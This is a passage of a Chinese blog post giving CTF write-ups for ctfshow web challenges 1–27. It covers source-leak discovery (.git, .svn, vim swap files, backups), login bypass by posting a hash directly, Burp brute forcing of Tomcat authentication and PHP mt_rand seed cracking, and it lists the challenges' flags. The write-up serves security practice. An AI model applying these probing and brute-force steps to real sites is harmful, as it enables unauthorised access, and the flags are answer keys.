<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">






  
  
    
      
    
    
      
    
  <script async src="//cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  <link href="//cdn.jsdelivr.net/npm/pace-js@1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">








<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />










  <meta name="baidu-site-verification" content="OTG88475E6" />









  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />


<link href="https://fonts.loli.net/css?family=EB+Garamond:400,400i,700,700i|Noto+Serif+SC:400,500,700&display=swap&subset=chinese-simplified" rel="stylesheet">




  

<link href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next%20.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="学习记录,ctf,web," />





  <link rel="alternate" href="/atom.xml" title="孤桜懶契" type="application/atom+xml" />






<meta name="description" content="前言 记录web的题目wp，慢慢变强，铸剑。  信息搜集web1 右键查看源代码即可 ctrl+u  web2 1、关掉javascript然后查看源码 2、ctrl+shift+i 3、view-source: 4、点击更过工具，开发者工具查看元素获得页面注释通过开发者工具查看网络response结果获得flag   web3 开发者工具network抓包查看http协议头里面有个flag协议头">
<meta property="og:type" content="article">
<meta property="og:title" content="【ctfshow】web篇wp记录（持续更新）">
<meta property="og:url" content="https://gylq.gitee.io/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/index.html">
<meta property="og:site_name" content="孤桜懶契">
<meta property="og:description" content="前言 记录web的题目wp，慢慢变强，铸剑。  信息搜集web1 右键查看源代码即可 ctrl+u  web2 1、关掉javascript然后查看源码 2、ctrl+shift+i 3、view-source: 4、点击更过工具，开发者工具查看元素获得页面注释通过开发者工具查看网络response结果获得flag   web3 开发者工具network抓包查看http协议头里面有个flag协议头">
<meta property="og:image" content="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210706204027073~1.jpg">
<meta property="article:published_time" content="2021-07-13T00:18:08.848Z">
<meta property="article:modified_time" content="2021-08-01T22:15:08.905Z">
<meta property="article:author" content="孤桜懶契">
<meta property="article:tag" content="学习记录">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210706204027073~1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"flipYIn","post_header":"perspectiveRightIn","post_body":"perspectiveLeftIn","coll_header":"swoopIn","sidebar":"shrinkIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://gylq.gitee.io/2021/07/13/【ctfshow】web篇wp记录（持续更新）/"/>





<!-- 设置文章需要密码访问 -->
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>

  <title>【ctfshow】web篇wp记录（持续更新） | 孤桜懶契</title>
  





<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b56c2f3ac99ab0c4efa4cba7755ec64a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>





  
      <!-- 球型气泡标签云 -->
      <script type="text/javascript" src="/js/src/bubble.js"></script>
  

  
      <!-- haoyuePlayer 播放器，移动端大小适配-->
      <meta name="viewport" content="width=device-width, initial-scale=0.9, maximum-scale=0.9" />
  

<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <!--fork me from github-->
    <a href="https://space.bilibili.com/13563835" target="_blank" rel="noopener" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#64CEAA; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">孤桜懶契</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">Run</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-导航">
          <a href="/gylq-navigation/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br />
            
            导航
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-life">
          <a href="/life/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-apple"></i> <br />
            
            生活
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>






<link href="https://cdn.bootcss.com/dplayer/1.25.0/DPlayer.min.css" rel="stylesheet">
<script src="https://cdn.bootcss.com/dplayer/1.25.0/DPlayer.min.js"></script>
<script src="https://cdn.bootcss.com/hls.js/0.12.4/hls.min.js"></script>
<script>
    function __create__dps(videos) {
        for (i = 0; i < videos.length; i++) {
            new DPlayer({
                container: document.getElementById('__dp' + i),
                screenshot: true,
                video: {
                    url: videos[i]
                }
            });
        }
        // 修正 Mirages 1.7.10 视频比例错误
        setTimeout(() => {
            let __elementList = document.querySelectorAll('.video-container.video-4-3');
            for (let __element of __elementList) {
                __element.className = 'video-container video-16-9';
                __element.setAttribute('style', 'position: initial;');
            }
        }, 300);
    }
</script> </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://gylq.gitee.io/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="孤桜懶契">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/qq.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="孤桜懶契">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">【ctfshow】web篇wp记录（持续更新）</h2>
        

        <div class="post-meta">
          <span class="post-time">

             
                 <i class="fa fa-thumb-tack"></i>
                 <font color=7D26CD>置顶</font>
                 <span class="post-meta-divider">|</span>
             

             

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-07-13T08:18:08+08:00">
                2021-07-13
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2021/07/13/%E3%80%90ctfshow%E3%80%91web%E7%AF%87wp%E8%AE%B0%E5%BD%95%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/" class="leancloud_visitors" data-flag-title="【ctfshow】web篇wp记录（持续更新）">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          <!--
          
          -->

          
            <span class="post-wordcount">
              
                
                  <span class="post-meta-divider">|</span>
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                <span title="字数">
                  18.5k
                </span>
              

              

              
            </span>
          

          <!-- 隐藏文章内标题下，内容描述
          
          -->

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      
        <div class="post-gallery" itemscope itemtype="http://schema.org/ImageGallery">
          
          
            <div class="post-gallery-row">
              <a class="post-gallery-img fancybox"
                 href="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210706204027073~1.jpg" rel="gallery_ckra7euqs004j68u3g1ithxmw"
                 itemscope itemtype="http://schema.org/ImageObject" itemprop="url">
                <img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210706204027073~1.jpg" itemprop="contentUrl"/>
              </a>
            
          

          
          </div>
        </div>
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><blockquote>
<p>记录web的题目wp，慢慢变强，铸剑。</p>
</blockquote>
<h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><blockquote>
<p>右键查看源代码即可</p>
<p>ctrl+u</p>
</blockquote>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><blockquote>
<p>1、关掉javascript然后查看源码</p>
<p>2、ctrl+shift+i</p>
<p>3、view-source:</p>
<p>4、点击更过工具，开发者工具查看元素获得页面注释通过开发者工具查看网络response结果获得flag</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/f10dd25185cb296b3d40c25c8a55e470.png" alt="image-20210601202056830"></p>
<h2 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h2><blockquote>
<p>开发者工具network抓包查看http协议头里面有个flag协议头，提交即可burpsuite抓包也可以</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0760a2285985202b90199b57e9a50161.png" alt="image-20210601202158461"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d97503fc40dff91069727180d198f67f.png" alt="image-20210601202315569"></p>
<blockquote>
<p>ctfshow{53968446-5c49-4e0a-a6af-3df14463c786}</p>
</blockquote>
<h2 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h2><blockquote>
<p>直接上手君子协议</p>
<p>ctfshow{ca6071e4-33fd-4e4b-8f0e-c08bc2b1e7b1}</p>
</blockquote>
<h2 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h2><blockquote>
<p>考虑了半天，提示phps源码泄露</p>
<p>还是得看tips</p>
<p>ctfshow{70bc7249-1347-4d63-9f62-b1c752661b03}</p>
</blockquote>
<h2 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h2><blockquote>
<p>/<a href="http://www.zip，下载源码，然后网页上访问http://55a647d5-d0fc-40ec-93e4-edd2b997ed11.challenge.ctf.show:8080/fl000g.txt" target="_blank" rel="noopener">www.zip，下载源码，然后网页上访问http://55a647d5-d0fc-40ec-93e4-edd2b997ed11.challenge.ctf.show:8080/fl000g.txt</a></p>
<p>ctfshow{6a630fef-804b-4f6a-a892-e3e3f0f5fe6f}</p>
</blockquote>
<h2 id="web7"><a href="#web7" class="headerlink" title="web7"></a>web7</h2><blockquote>
<p>考部署环境，时/.git/泄露代码</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/6fc7799bd8f1806b339ea8fbc43d01d1.png" alt="image-20210601203750323"></p>
<h2 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h2><blockquote>
<p>是svn代码泄露，url/.svn/，后面这个/一定要加，不然就进不去</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/36cd8250a04519f82477cbc7b0cfadd7.png" alt="image-20210601205103745"></p>
<h2 id="web9"><a href="#web9" class="headerlink" title="web9"></a>web9</h2><blockquote>
<p>linux中vim访问缓冲index.php.swp信息泄露</p>
<p>ctfshow{6100df72-a079-4f17-97b8-56886e12c786}</p>
</blockquote>
<h2 id="web10"><a href="#web10" class="headerlink" title="web10"></a>web10</h2><blockquote>
<p>cookie中</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/94a5d82a2cc9ae8e91c06af428317502.png" alt="image-20210601205626532"></p>
<h2 id="web11"><a href="#web11" class="headerlink" title="web11"></a>web11</h2><blockquote>
<p><a href="https://zijian.aliyun.com/" target="_blank" rel="noopener">https://zijian.aliyun.com/</a> 查域名</p>
<p><a href="http://dbcha.com/?t=1625617640" target="_blank" rel="noopener">http://dbcha.com/?t=1625617640</a> 查域名</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d895049d59178cfb8b82e1e76da663c2.png" alt="image-20210601210418143"></p>
<h2 id="web12"><a href="#web12" class="headerlink" title="web12"></a>web12</h2><blockquote>
<p>先看一波君子协议</p>
<p>然后admin和他手机是密码</p>
<p>robots.txt</p>
</blockquote>
<h2 id="web13"><a href="#web13" class="headerlink" title="web13"></a>web13</h2><blockquote>
<p>document下载</p>
<p>技术文档</p>
</blockquote>
<h2 id="web14"><a href="#web14" class="headerlink" title="web14"></a>web14</h2><blockquote>
<p>看题目，写editor编译器泄露，查看源码搜索找到editor</p>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707083802791.png" alt="image-20210707083802791"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707083825874.png" alt="image-20210707083825874"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707083848916.png" alt="image-20210707083848916"></p>
<blockquote>
<p>通过路径找到flag</p>
<p><a href="http://c8ed7f63-f69c-4c94-9a34-5988bbdf9155.challenge.ctf.show:8080/nothinghere/fl000g.txt" target="_blank" rel="noopener">http://c8ed7f63-f69c-4c94-9a34-5988bbdf9155.challenge.ctf.show:8080/nothinghere/fl000g.txt</a></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707083923575.png" alt="image-20210707083923575"></p>
</blockquote>
<h2 id="web15"><a href="#web15" class="headerlink" title="web15"></a>web15</h2><blockquote>
<p>通过邮箱查地址</p>
<p>改密码：西安</p>
</blockquote>
<h2 id="web16"><a href="#web16" class="headerlink" title="web16"></a>web16</h2><blockquote>
<p>进入tz.php这是默认</p>
<p>然后再点击phpinfo按钮里面有flag</p>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707084326227.png" alt="image-20210707084326227"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707084345975.png" alt="image-20210707084345975"></p>
<h2 id="web17"><a href="#web17" class="headerlink" title="web17"></a>web17</h2><blockquote>
<p>ping <a href="http://www.ctfshow.com" target="_blank" rel="noopener">www.ctfshow.com</a></p>
</blockquote>
<h2 id="web18"><a href="#web18" class="headerlink" title="web18"></a>web18</h2><blockquote>
<p><a href="http://d3be1272-066a-49ff-a6e8-b8def169e782.challenge.ctf.show:8080/110.php" target="_blank" rel="noopener">http://d3be1272-066a-49ff-a6e8-b8def169e782.challenge.ctf.show:8080/110.php</a></p>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210602184900428.png" alt="image-20210602184900428"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707090523103.png" alt="image-20210707090523103"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210602184928433.png" alt="image-20210602184928433"></p>
<h2 id="web19"><a href="#web19" class="headerlink" title="web19"></a>web19</h2><blockquote>
<p>绕过前端JS直接提交hash使用hackbar的post：pazzword=a599ac85a73384ee3219fa684296eaa62667238d608efa81837030bd1ce1bf04&amp;username=admin</p>
<p>post传参</p>
</blockquote>
<h2 id="web20"><a href="#web20" class="headerlink" title="web20"></a>web20</h2><blockquote>
<p>mdb文件asp+access数据库文件泄露</p>
<p>db/db.mdb，打开</p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210707092002656.png" alt="image-20210707092002656"></p>
</blockquote>
<h1 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h1><h2 id="web21"><a href="#web21" class="headerlink" title="web21"></a>web21</h2><blockquote>
<p>tomcat认证爆破之burp custom iterator</p>
<ul>
<li><strong>第一种方式-burp使用之自定义迭代器</strong></li>
</ul>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/600eecb8b19793f8f443b4f41eda1b29.png" alt="image-20210602075713742"></p>
<blockquote>
<p>base64解密  就是 admin:admin形式，<strong>我输入的账号和密码就是admin和admin</strong></p>
<p>说明这是base64加密</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/img_convert/53682bb5b322a960c84dbb25538ffa37.png" alt="image-20210602075845504"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/8f9d777faa9e44dee92737070636d375.png" alt="image-20210602080000069"></p>
<p><strong>position(1)</strong></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/17cf3e0095d4ac83a12439bba402ec9c.png" alt="image-20210602080029936"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/6cb45046c04b2427f0cef861b64182f9.png" alt="image-20210602080057955"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/64a2db62fc7659c3a9ed2e9722a29f97.png" alt="image-20210602080159630"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210602082330741.png" alt="image-20210602082330741"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210602082906219.png" alt="image-20210602082906219"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/a32cca75293441b030b9cf291a0a347d.png" alt="image-20210602080221754"></p>
<blockquote>
<ul>
<li>第二种方式-直接固定前缀<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709091316243.png" alt="image-20210709091316243"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709091404655.png" alt="image-20210709091404655"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709091423940.png" alt="image-20210709091423940"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709091444181.png" alt="image-20210709091444181"></li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="web22"><a href="#web22" class="headerlink" title="web22"></a>web22</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709091949204.png" alt="image-20210709091949204"></li>
<li>说是爆破子域名用这个网站：<a href="https://phpinfo.me/domain" target="_blank" rel="noopener">https://phpinfo.me/domain</a></li>
<li>第二种是利用搜索引擎的语法进行搜索<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210709092027358.png" alt="image-20210709092027358"></li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="web23"><a href="#web23" class="headerlink" title="web23"></a>web23</h2><blockquote>
<ul>
<li><p>源代码</p>
<ul>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210710175437343.png" alt="image-20210710175437343"></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2020-09-03 11:43:51</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by:   h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-09-03 11:56:11</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'token'</span>]))&#123;</span><br><span class="line">    $token = md5($_GET[<span class="string">'token'</span>]);</span><br><span class="line">    <span class="keyword">if</span>(substr($token, <span class="number">1</span>,<span class="number">1</span>)===substr($token, <span class="number">14</span>,<span class="number">1</span>) &amp;&amp; substr($token, <span class="number">14</span>,<span class="number">1</span>) ===substr($token, <span class="number">17</span>,<span class="number">1</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>((intval(substr($token, <span class="number">1</span>,<span class="number">1</span>))+intval(substr($token, <span class="number">14</span>,<span class="number">1</span>))+substr($token, <span class="number">17</span>,<span class="number">1</span>))/substr($token, <span class="number">1</span>,<span class="number">1</span>)===intval(substr($token, <span class="number">31</span>,<span class="number">1</span>)))&#123;</span><br><span class="line">            <span class="keyword">echo</span> $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>



</li>
</ul>
</li>
</ul>
<ul>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210710175548108.png" alt="image-20210710175548108"></p>
</li>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210710175616862.png" alt="image-20210710175616862"></p>
</li>
<li><p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210710175638605.png" alt="image-20210710175638605"></p>
</li>
</ul>
</blockquote>
<h2 id="web24"><a href="#web24" class="headerlink" title="web24"></a>web24</h2><blockquote>
<ul>
<li><strong>mt_srand(seed) 根据seed的值会一直不变，不过不同的php版本会导致不同的结果</strong></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210711101447840.png" alt="image-20210711101447840"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210711101522334.png" alt="image-20210711101522334"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210711101557022.png" alt="image-20210711101557022"></li>
</ul>
</blockquote>
<h2 id="web25"><a href="#web25" class="headerlink" title="web25"></a>web25</h2><blockquote>
<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712092257701.png" alt="image-20210712092257701"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712092323692.png" alt="image-20210712092323692"></li>
<li><strong>使用网上找的程序php_mt_seed随机种子破解<a href="https://www.openwall.com/php_mt_seed/" target="_blank" rel="noopener">https://www.openwall.com/php_mt_seed/</a></strong></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712092530617.png" alt="image-20210712092530617"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712094851762.png" alt="image-20210712094851762"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712094952070.png" alt="image-20210712094952070"></li>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210712095025135.png" alt="image-20210712095025135"></li>
</ul>
</blockquote>
<h2 id="web26"><a href="#web26" class="headerlink" title="web26"></a>web26</h2><blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715215131122.png" alt="image-20210715215131122"></p>
</blockquote>
<h2 id="web27"><a href="#web27" class="headerlink" title="web27"></a>web27</h2><blockquote>
<ul>
<li>得到了名单，明显缺少出生年月日<ul>
<li><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210715215249427.png" alt="image-20210715215249427"></li>
</ul>
</li>
